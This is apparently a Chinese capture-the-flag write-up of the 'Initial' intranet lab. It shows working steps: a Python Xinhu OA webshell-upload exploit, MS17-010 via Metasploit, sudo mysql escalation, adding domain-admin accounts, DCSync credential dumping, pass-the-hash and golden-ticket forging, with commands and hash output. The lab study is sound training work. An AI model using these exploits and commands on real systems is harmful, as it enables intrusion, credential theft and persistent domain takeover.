内网渗透计战法-春秋云境Initial靶场
Initial
考点:
- thinkphp 5.0.23 RCE
- mysql命令提权
- 信呼nday
- ms17-010(永恒之蓝)
- DCSync拿NTLM,PTH
- 黄金票据进行权限维持
DCSync原理是利用域控制器之间的数据同步复制
DCSync是AD域渗透中常用的凭据窃取手段,默认情况下,域内不同DC每隔15分钟会进行一次数据同步,当一个DC从另外一个DC同步数据时,发起请求的一方会通过目录复制协议(MS- DRSR)来对另外一台域控中的域用户密码进行复制,DCSync就是利用这个原理,“模拟”DC向真实DC发送数据同步请求,获取用户凭据数据,由于这种攻击利用了Windows RPC协议,并不需要登陆域控或者在域控上落地文件,避免触发EDR告警,因此DCSync时一种非常隐蔽的凭据窃取方式
DCSync 攻击前提:
想进行DCSync 攻击,必须获得以下任一用户的权限:
Administrators 组内的用户
Domain Admins 组内的用户
Enterprise Admins 组内的用户域控制器的计算机帐户
即:默认情况下域管理员组具有该权限
从 DACL 层面说,要发起 DCSync,发起者必须在域对象上拥有以下两条极高权限的 ACL(访问控制列表):
- DS-Replication-Get-Changes (复制目录更改)
- DS-Replication-Get-Changes-All (复制目录更改所有项)
thinkphp外网机
vshell反向上线
find / -type f -iname "flag*" 2>/dev/null
没找到flag,权限为www-data,应该需要提权
www-data@ubuntu-web01:/var/www/html$ sudo -l
Matching Defaults entries for www-data on ubuntu-web01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
(root) NOPASSWD: /usr/bin/mysql
sudo mysql -e '\! /bin/sh'
find / -type f -iname "flag*" 2>/dev/null
cat /root/flag/flag01.txt
flag01: flag{60b53231-
fscan
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:31:9a:13 brd ff:ff:ff:ff:ff:ff
inet 172.22.1.15/16 brd 172.22.255.255 scope global dynamic eth0
valid_lft 1892158357sec preferred_lft 1892158357sec
inet6 fe80::216:3eff:fe31:9a13/64 scope link
valid_lft forever preferred_lft forever
./fscan -h 172.22.1.15/16
[2025-12-01 20:52:23] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.1.21
主机名: XIAORANG-WIN7
发现的网络接口:
IPv4地址:
└─ 172.22.1.21
[2025-12-01 20:52:23] [SUCCESS] NetBios 172.22.1.2 DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-12-01 20:52:23] [SUCCESS] 发现漏洞 172.22.1.21 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
[2025-12-01 20:52:23] [INFO] 系统信息 172.22.1.2 [Windows Server 2016 Datacenter 14393]
[2025-12-01 20:52:23] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.1.2
主机名: DC01
发现的网络接口:
IPv4地址:
└─ 172.22.1.2
[2025-12-01 20:52:23] [SUCCESS] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-12-01 20:52:23] [SUCCESS] 网站标题 http://172.22.1.18 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.1.18?m=login
[2025-12-01 20:52:23] [SUCCESS] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[2025-12-01 20:52:23] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.1.18
主机名: XIAORANG-OA01
发现的网络接口:
IPv4地址:
└─ 172.22.1.18
[2025-12-01 20:52:23] [SUCCESS] 网站标题 http://172.22.1.18?m=login 状态码:200 长度:4012 标题:信呼协同办公系统
隧道代理
172.22.1.18信呼协同办公系统
admin:admin123弱口令
使用已知poc
# 1.php为webshell
# 需要修改以下内容:
# url_pre = 'http://<IP>/'
# 'adminuser': '<ADMINUSER_BASE64>',
# 'adminpass': '<ADMINPASS_BASE64>',
import requests
session = requests.session()
url_pre = 'http://<IP>/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
# url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=<ID>'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': '<ADMINUSER_BASE64>',
'adminpass': '<ADMINPASS_BASE64>',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
print(filepath)
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
运行结果
D:\python3.11.2\python3.exe F:\111_pythonstudy\渗透\信呼OA.py
/upload/2025-12/01_20573729.php
<br />
<b>Notice</b>: Undefined offset: 0 in <b>C:\phpStudy\PHPTutorial\WWW\upload\2025-12\01_20573729.php</b> on line <b>1</b><br />
蚁剑连接http://172.22.1.18/upload/2025-12/01_20573729.php
windows反向上线以及正向上线均失败
for /r C:\ %i in (flag*) do @echo %i 2>nul
C:\Program Files (x86)\Alibaba\Aegis\PythonLoader\third_party\pymysql\constants\FLAG.py
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.lnk
85dd845
C:\phpStudy\PHPTutorial\WWW\upload\2025-12
500b82f
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag02.txt.lnk
85dd845
C:\phpStudy\PHPTutorial\WWW\upload\2025-12
500b82f
C:\Users\Administrator\flag\flag02.txt
85dd845
C:\phpStudy\PHPTutorial\WWW\upload\2025-12
500b82f
type C:\Users\Administrator\flag\flag02.txt
___ ___ ___ ________ ________ ________ ________ ________ ________
|\ \ / /|\ \|\ __ \|\ __ \|\ __ \|\ __ \|\ ___ \|\ ____\
\ \ \/ / | \ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \\ \ \ \ \___|
\ \ / / \ \ \ \ __ \ \ \\\ \ \ _ _\ \ __ \ \ \\ \ \ \ \ ___
/ \/ \ \ \ \ \ \ \ \ \\\ \ \ \\ \\ \ \ \ \ \ \\ \ \ \ \|\ \
/ /\ \ \ \__\ \__\ \__\ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\
/__/ /\ __\ \|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|
|__|/ \|__|
flag02: 2ce3-4813-87d4-
Awesome! ! ! You found the second flag, now you can attack the domain controller.
提示攻击DC
172.22.1.21永恒之蓝
vim /etc/proxychains.conf
175.27.251.122 17789
proxychains msfconsole
注意这种方式拿到shell后因为proxychains的某些缘故shell会卡住
最好在msf6状态时设置代理set Proxies socks5:175.27.251.122:17888
对于编码问题set consoleencoding gbk
接下来攻击永恒之蓝
search MS17-010
use 0
options
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhosts 172.22.1.21
run
然后进shell
exit退出到meterpreter
成功拿到shell
此内网机没有flag,应该就在域控里了,需要想办法横向移动至域控
编码问题
chcp 65001 #修改shell内编码问题
set consoleencoding gbk #修改msf编码问题
shell
chcp 65001 #改编码为GBK
C:\Windows\system32>for /r C:\ %i in (flag*) do @echo %i 2>nul
for /r C:\ %i in (flag*) do @echo %i 2>nul
C:\Program Files (x86)\Alibaba\Aegis\PythonLoader\third_party\pymysql\constants\FLAG.py
C:\Program Files (x86)\Alibaba\Aegis\PythonLoaderTemp\third_party\pymysql\constants\FLAG.py
rdp
添加本地用户
net user test Abc123456 /add
net localgroup administrators test /add
net user hackuser Abc123456! /add /domain
net group "Domain Admins" hackuser /add /domain
XIAORANG-WIN7\test:Abc123456可以登录
然后打DCSync
#加载Mimikatz模块
load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ 4e3ed87898637057eed824113569fe69 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ c284e5ff66b727cbb253da7b58964502 4096
1108 XIAORANG-WIN7$ 38ce501bcbef7c273d936cb4430fb69a 4096
直接用Impacket库的secretsdump.py也可以
load kiwi
kiwi_cmd sekurlsa::logonpasswords
抓到XIAORANG-WIN7$的NTLM 38ce501bcbef7c273d936cb4430fb69a
proxychains python3 /root/Desktop/tools/secretsdump.py 'xiaorang.lab/XIAORANG-WIN7$@172.22.1.2' -hashes :38ce501bcbef7c273d936cb4430fb69a
Administrator:500:aad3b435b51404eeaad3b435b51404ee:10cf89a850fb1cdbe6bb432b859164c8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb812eea13a18b7fcdb8e6d67ddc205b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Marcus:1106:aad3b435b51404eeaad3b435b51404ee:e07510a4284b3c97c8e7dee970918c5c:::
Charles:1107:aad3b435b51404eeaad3b435b51404ee:f6a9881cd5ae709abb4ac9ab87f24617:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:4e3ed87898637057eed824113569fe69:::
XIAORANG-OA01$:1104:aad3b435b51404eeaad3b435b51404ee:c284e5ff66b727cbb253da7b58964502:::
XIAORANG-WIN7$:1108:aad3b435b51404eeaad3b435b51404ee:38ce501bcbef7c273d936cb4430fb69a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:b845ab43f0a41be35cf37e2256d51b3d8ea0170ec44afece7c95d210f2dcdfbe
Administrator:aes128-cts-hmac-sha1-96:e5c0f552a74280149f5fe742a1792eed
Administrator:des-cbc-md5:e9437c949e7c6294
krbtgt:aes256-cts-hmac-sha1-96:acbbedcabc9ad1d8638cda298e15761626e1bce7ce80eae90d95252f8162bba8
krbtgt:aes128-cts-hmac-sha1-96:207ea00513bdf19042937aa38c9ad2dd
krbtgt:des-cbc-md5:c70ee386138c7016
Marcus:aes256-cts-hmac-sha1-96:ca155811072dd4f24c38320e2078e46ce1e0ec41b893a3f4f96ac09661648977
Marcus:aes128-cts-hmac-sha1-96:f07e881e2f6d7e5daac4c6d5d1d221a0
Marcus:des-cbc-md5:7cd04c4a0e3dae80
Charles:aes256-cts-hmac-sha1-96:a84483b8f8326f177a63ee7730120eca3193f8ba36d5550d76406456ee1fe7d2
Charles:aes128-cts-hmac-sha1-96:5558c762b2380b74e73ba378cabca567
Charles:des-cbc-md5:0d0b514f86a75d92
DC01$:aes256-cts-hmac-sha1-96:44e9c969187dc3b07e8f74ba0e82d1e94dede357e722da38fb5908084ad71d02
DC01$:aes128-cts-hmac-sha1-96:f37448457bb8ccf5c52e07918db1e94b
DC01$:des-cbc-md5:5445b99e809b231f
XIAORANG-OA01$:aes256-cts-hmac-sha1-96:9671b3eace3f57e90118d749280f407622617ebad06dcaf13da26d16244cfb7a
XIAORANG-OA01$:aes128-cts-hmac-sha1-96:cf175aacac0457b8bfdf2d656258f82e
XIAORANG-OA01$:des-cbc-md5:fdabc1b010c8ec32
XIAORANG-WIN7$:aes256-cts-hmac-sha1-96:87fb5defd1d44be5899639b608c90d5a6013feb5cbce2a668a1c80d62bf123ec
XIAORANG-WIN7$:aes128-cts-hmac-sha1-96:2ebd8dbee51d399d4ffc31b205283a13
XIAORANG-WIN7$:des-cbc-md5:2a4ad0971f8f405b
哈希传递
Pass The Hash 即PTH,也是内网渗透中较未常见的一个术语,就是通过传递Windwos 本地账户或者域用户的hash值,达到控制其他服务器的目的
在进入企业内网之后,如果是Windows PC或者服务器较多的环境,极有可能会使用到hash传递来进行内网的横传,现在企业内部一般对于口令强度均有一定的要求,抓取到本地hash后可能无法进行破解,同时从Windows Vista和Windows Server 2008开始,微软默认禁用LM hash.在Windows Server 2012 R2及之后版本的操作系统中,默认不会在内存中保存明文密码,这时可以通过传递hash来进行横传。
适用场景:内网中大量主机密码相同。
hash 传递的原理是在认证过程中,并不是直接使用用户的密码进行认证的,而是使用用户的hash值,因此,攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不需要提供明文密码。在Windows系统中,通常会使用NTLM身份认证,NTLM是口令加密后的hash值。PTH是基于smb服务(139端口和445 端口)
用WMIExec或者Psexec获取Shell
proxychains python3 /root/Desktop/tools/wmiexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.2 -codec gbk
proxychains python3 /root/Desktop/tools/psexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.2 -codec gbk
或者用CME(crackmapexec)
-x 通过cmd.exe 执行命令
-X 通过cmd.exe 调用执行powershell命令
crackmapexec smb 192.168.216.144 -u 'administrator' -p 'pass1234!' -x 'whoami'
或者使用ntlm hash
crackmapexec smb 192.168.216.144 -u 'administrator' -H 'aad3b435b51404eeaad3b435b51404ee:ff1a0a31d936bc8bf8b1ffc5b244b356' -x 'whoami'
默认情况下会自动选择登录域,-d可以指定域登录,-x 要执行的命令
CME将按以下顺序执行命令
1.wmiexec:通过WMI执行命令
2.atexe:通过Windows任务调度程序调度任务来执行命令
3.smbexec:通过创建和运行服务来执行命令
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
注意利用mimikatz进行PTH的话不行,执行成功后他会新弹出一个shell窗口,在msf里没法利用
kiwi_cmd sekurlsa::pth /user:administrator /domain:172.22.1.2 /ntlm:10cf89a850fb1cdbe6bb432b859164c8
这里还可以利用krbtgt用户
krbtgt用户:
Kerberos Ticket Granting Ticket服务账户
域控中最重要的账户
它的NTLM哈希用于签发Kerberos票据
有了krbtgt的NTLM哈希 = 可以伪造黄金票据(Golden Ticket)
黄金票据 = 永久的域管理员权限
即使域管密码改了,黄金票据依然有效
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 2022/6/5 20:40:39
Object Security ID : S-1-5-21-314492864-3856862959-4045974917-502
Object Relative ID : 502
Credentials:
Hash NTLM: fb812eea13a18b7fcdb8e6d67ddc205b
ntlm- 0: fb812eea13a18b7fcdb8e6d67ddc205b
lm - 0: c4f45322c850c77aecb3aa71c2e44c1e
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 849f7f8ab6eb3b3a1c7c926de5ee5574
* Primary:Kerberos-Newer-Keys *
Default Salt : XIAORANG.LABkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : acbbedcabc9ad1d8638cda298e15761626e1bce7ce80eae90d95252f8162bba8
aes128_hmac (4096) : 207ea00513bdf19042937aa38c9ad2dd
des_cbc_md5 (4096) : c70ee386138c7016
* Primary:Kerberos *
Default Salt : XIAORANG.LABkrbtgt
Credentials
des_cbc_md5 : c70ee386138c7016
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 e1108dfe63de9eeca1eefb995e0929bf
02 20b58dbb0fc4e2b4e2cb7ab85f3e711f
03 8a758e996035e1bc42ff1632cf94d2f4
04 e1108dfe63de9eeca1eefb995e0929bf
05 20b58dbb0fc4e2b4e2cb7ab85f3e711f
06 17b26c73d1998bf5e4389b6c946375b9
07 e1108dfe63de9eeca1eefb995e0929bf
08 44fae0b038a11e0aa22bf9c0bb56fde3
09 44fae0b038a11e0aa22bf9c0bb56fde3
10 72d34f6f745066292fc20c2bb9afe9aa
11 64bb1fe398f58cb09752c6cf99ba38d7
12 44fae0b038a11e0aa22bf9c0bb56fde3
13 3a6c03097d06f3d661fab05dd266b8db
14 64bb1fe398f58cb09752c6cf99ba38d7
15 066092366aa2d4cac0c40b732c663580
16 066092366aa2d4cac0c40b732c663580
17 109ffa596356b70d245729765d970b84
18 b38c61423c6240cc51e237825b24011f
19 659c24dbf455331d171d56dee8ce401f
20 70ac8d2c7e5d33c8b05d05bf48dfc66d
21 04a52bb90362eb38a60a2a7879232aac
22 04a52bb90362eb38a60a2a7879232aac
23 0de96f588c278f0520ce23606f88894b
24 b3785273258b55001fec33d8adb718d8
25 b3785273258b55001fec33d8adb718d8
26 65dcf594b8a0be48f803aba2c8c02fd1
27 803052ac4fb8934f4aba581e8533fdb5
28 32b62b5536e1ca61eb0ae7e1fb69f0c9
29 01cb2d0d07700cbf85f27dcf2d15eee0
kiwi_cmd kerberos::purge #清除票据
或者
shell
klist purge
exit
kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917 /rc4:fb812eea13a18b7fcdb8e6d67ddc205b /ptt
•注意这里sid不需要最后的-502
•声称"我是administrator",用krbtgt的哈希签名(域控信任)自动注入到当前会话,现在 = 域管理员权限!
# Check if the ticket is in memory
kiwi_cmd kerberos::list
[00000000] - 0x00000017 - rc4_hmac_nt
Start/End/MaxRenew: 2025/12/4 21:46:05 ; 2035/12/2 21:46:05 ; 2035/12/2 21:46:05
Server Name : krbtgt/xiaorang.lab @ xiaorang.lab
Client Name : administrator @ xiaorang.lab
Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;
# Verify access (should list the DC's C$ share)
shell
此时可以用 Golden Ticket 访问域内任何一台 PC
dir \\DC01.xiaorang.lab\c$
type \\DC01.xiaorang.lab\c$\Users\Administrator\flag\flag03.txt
dir \\XIAORANG-OA01.xiaorang.lab\c$
type \\XIAORANG-OA01.xiaorang.lab\c$\Users\Administrator\flag\flag02.txt
或者用impacket
proxychains python3 /root/Desktop/tools/ticketer.py -nthash fb812eea13a18b7fcdb8e6d67ddc205b -domain-sid S-1-5-21-314492864-3856862959-4045974917-502 -domain xiaorang.lab Administrator
注意这里sid不需要最后的-502
export KRB5CCNAME=/root/Administrator.ccache
# -k: 使用 Kerberos 认证
# -no-pass: 不询问密码
sudo sh -c "echo '172.22.1.2 DC01.xiaorang.lab xiaorang.lab' >> /etc/hosts"
proxychains python3 /root/Desktop/tools/wmiexec.py -k -no-pass xiaorang.lab/Administrator@DC01.xiaorang.lab
尝试PTH一下Marcus用户,因为Marcus用户也在Domain Admins组里面
C:\Windows\system32>net group "Domain Admins" /domain
net group "Domain Admins" /domain
The request will be processed at a domain controller for domain xiaorang.lab.
Group name Domain Admins
Comment ����������Ա
Members
-------------------------------------------------------------------------------
Administrator Marcus
The command completed successfully.
┌──(root㉿kali)-[~]
└─# proxychains crackmapexec smb 172.22.1.2 -u Marcus -He07510a4284b3c97c8e7dee970918c5c -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Dynamic chain ... 175.27.251.122:17888 ... 172.22.1.2:445 ... OK
[proxychains] Dynamic chain ... 175.27.251.122:17888 ... 172.22.1.2:135 ... OK
SMB 172.22.1.2 445 DC01 [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
[proxychains] Dynamic chain ... 175.27.251.122:17888 ... 172.22.1.2:445 ... OK
SMB 172.22.1.2 445 DC01 [-] xiaorang.lab\Marcus:e07510a4284b3c97c8e7dee970918c5c STATUS_PASSWORD_EXPIRED
但是显示STATUS_PASSWORD_EXPIRED密码已经过期
尝试为其创建一个新密码:
proxychains /root/Desktop/tools/smbpasswd.py xiaorang.lab/Marcus@172.22.1.2 -hashes :e07510a4284b3c97c8e7dee970918c5c -newpass NewPassword123!
报错:
SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
权限不允许,此路走不通
还剩下一个Charles用户
net user Charles /domain
User name Charles
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2022/6/5 22:03:36
Password expires 2022/7/17 22:03:36
Password changeable 2022/6/6 22:03:36
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2022/6/5 22:51:12
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
proxychains crackmapexec smb 172.22.1.2 -u Charles -H f6a9881cd5ae709abb4ac9ab87f24617 -x "type C:\Users\Charles\flag\flag04.txt"
proxychains python3 /root/Desktop/tools/wmiexec.py -hashes :f6a9881cd5ae709abb4ac9ab87f24617 xiaorang.lab/Charles@172.22.1.2
proxychains crackmapexec smb 172.22.1.2 -u Charles -H f6a9881cd5ae709abb4ac9ab87f24617 -x "dir C:\Users\Charles\flag"
#STATUS_PASSWORD_EXPIRED全部是密码过期
只能用Administrator权限来改密码了,没有实际用处
# 1. 连接 (使用 Administrator 的哈希: 10cf89a850fb1cdbe6bb432b859164c8)
proxychains python3 /root/Desktop/tools/wmiexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.2
# 2. 在 wmiexec 的 shell 中执行重置命令
C:\> net user Charles NewPass123! /domain
浙公网安备 33010602011771号